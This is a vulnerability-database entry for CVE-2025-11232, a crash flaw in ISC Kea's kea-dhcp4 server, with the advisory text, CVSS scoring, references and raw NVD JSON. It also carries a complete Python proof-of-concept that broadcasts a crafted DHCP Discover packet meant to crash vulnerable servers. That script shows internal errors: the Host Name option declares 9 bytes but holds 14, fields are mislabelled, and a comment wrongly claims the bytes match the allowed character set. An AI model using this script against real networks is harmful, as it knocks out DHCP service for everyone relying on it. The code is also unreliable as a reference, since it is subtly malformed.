Security Vulnerability Report
CVE-2025-11232 CVSS 7.5 HIGH

CVE-2025-11232

Published: 2025-10-29 18:15:40
Last Modified: 2026-04-15 00:35:42

Description

To trigger the issue, three configuration parameters must have specific settings: "hostname-char-set" must be left at the default setting, which is "[^A-Za-z0-9.-]"; "hostname-char-replacement" must be empty (the default); and "ddns-qualifying-suffix" must *NOT* be empty (the default is empty). DDNS updates do not need to be enabled for this issue to manifest. A client that sends certain option content would then cause kea-dhcp4 to exit unexpectedly. This issue affects Kea versions 3.0.1 through 3.0.1 and 3.1.1 through 3.1.2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ISC Kea 3.0.1
ISC Kea 3.1.1
ISC Kea 3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-11232 PoC - ISC Kea DHCP Server DoS
Note: This PoC is for educational and security testing purposes only.
Requires specific Kea configuration to trigger the vulnerability.
"""
import socket
import struct
import sys


def create_dhcp_discover():
    """Create a DHCP Discover packet with crafted hostname option."""
    # DHCP Message Type: Discover (1)
    message_type = b'\x01'
    # Hardware Type: Ethernet (1)
    hardware_type = b'\x01'
    # Hardware Address Length: 6
    hw_addr_len = b'\x06'
    # Hops: 0
    hops = b'\x00'
    # Transaction ID (random)
    xid = b'\x39\x03\xf3\x26'
    # Seconds Elapsed: 0
    seconds = b'\x00\x00'
    # Bootp Flags: 0x8000 (Broadcast)
    flags = b'\x80\x00'
    # Client IP Address: 0.0.0.0
    ciaddr = b'\x00\x00\x00\x00'
    # Your IP Address: 0.0.0.0
    yiaddr = b'\x00\x00\x00\x00'
    # Server IP Address: 0.0.0.0
    siaddr = b'\x00\x00\x00\x00'
    # Gateway IP Address: 0.0.0.0
    giaddr = b'\x00\x00\x00\x00'
    # Client Hardware Address: 00:11:22:33:44:55
    chaddr = b'\x00\x11\x22\x33\x44\x55' + b'\x00' * 10
    # Server Host Name: 64 bytes
    sname = b'\x00' * 64
    # Boot File Name: 128 bytes
    boot_file = b'\x00' * 128
    # Magic Cookie
    magic_cookie = b'\x63\x82\x53\x63'

    # DHCP Options
    options = b''
    # Option 53: DHCP Message Type
    options += b'\x35\x01\x01'
    # Option 12: Host Name (crafted content)
    # Using characters that match hostname-char-set default regex
    host_name = b'\x0c\x09test\xae\xaf\xb0\xb1\xb2\xb3host'
    options += host_name
    # Option 55: Parameter Request List
    options += b'\x37\x03\x01\x03\x06'
    # End Option
    options += b'\xff'

    dhcp_packet = (message_type + hardware_type + hw_addr_len + hops +
                   xid + seconds + flags + ciaddr + yiaddr + siaddr +
                   giaddr + chaddr + sname + boot_file + magic_cookie +
                   options)
    return dhcp_packet


def exploit(target_ip='255.255.255.255', target_port=67):
    """Send crafted DHCP packet to trigger vulnerability."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        packet = create_dhcp_discover()
        print(f"[*] Sending crafted DHCP Discover to {target_ip}:{target_port}")
        print(f"[*] Packet size: {len(packet)} bytes")
        sock.sendto(packet, (target_ip, target_port))
        print("[+] Packet sent successfully")
        print("[*] If target has vulnerable configuration, kea-dhcp4 should crash")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else '255.255.255.255'
    exploit(target)

References

https://kb.isc.org/docs/cve-2025-11232
http://www.openwall.com/lists/oss-security/2025/10/29/5

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11232", "sourceIdentifier": "[email protected]", "published": "2025-10-29T18:15:40.197", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "To trigger the issue, three configuration parameters must have specific settings: \"hostname-char-set\" must be left at the default setting, which is \"[^A-Za-z0-9.-]\"; \"hostname-char-replacement\" must be empty (the default); and \"ddns-qualifying-suffix\" must *NOT* be empty (the default is empty). DDNS updates do not need to be enabled for this issue to manifest. A client that sends certain option content would then cause kea-dhcp4 to exit unexpectedly.\nThis issue affects Kea versions 3.0.1 through 3.0.1 and 3.1.1 through 3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-823"}]}], "references": [{"url": "https://kb.isc.org/docs/cve-2025-11232", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}